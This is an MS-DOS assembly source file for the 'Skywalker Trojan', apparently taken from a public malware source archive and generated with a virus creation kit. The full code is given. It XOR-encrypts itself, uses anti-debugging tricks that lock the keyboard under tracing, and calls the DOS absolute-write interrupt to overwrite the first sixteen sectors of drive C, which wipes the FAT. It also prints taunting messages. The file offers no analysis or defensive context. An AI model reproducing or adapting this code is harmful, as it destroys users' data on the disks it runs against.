MalwareSourceCode/MSDOS/I-Index/Virus.MSDOS.Unknown.intrview.asm

82 lines
2.2 KiB
NASM
Raw Permalink Normal View History

2021-01-12 23:47:04 +00:00
; INTRVIEW.ASM -- Skywalker Trojan
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Serpico
virus_type equ 3 ; Trojan Horse
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov si,offset data00 ; SI points to data
2022-08-21 09:07:57 +00:00
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
2021-01-12 23:47:04 +00:00
disp_strnend:
mov ax,0002h ; First argument is 2
mov cx,0010h ; Second argument is 16
2022-08-21 09:07:57 +00:00
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
2021-01-12 23:47:04 +00:00
sti ; Restore interrupts
mov ax,04C00h ; DOS terminate function
int 021h
main endp
2022-08-21 09:07:57 +00:00
data00 db "C'mon now, trim that FAT! 1 and 2 and 3 and....",13,10,10,0
2021-01-12 23:47:04 +00:00
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Please wait, interview is load"
db "ing. You've been infected with"
db "the Skywalker Trojan. HaHaHa"
db "YoDa - AlLiAnCe"
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: xor word ptr [si],06734h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main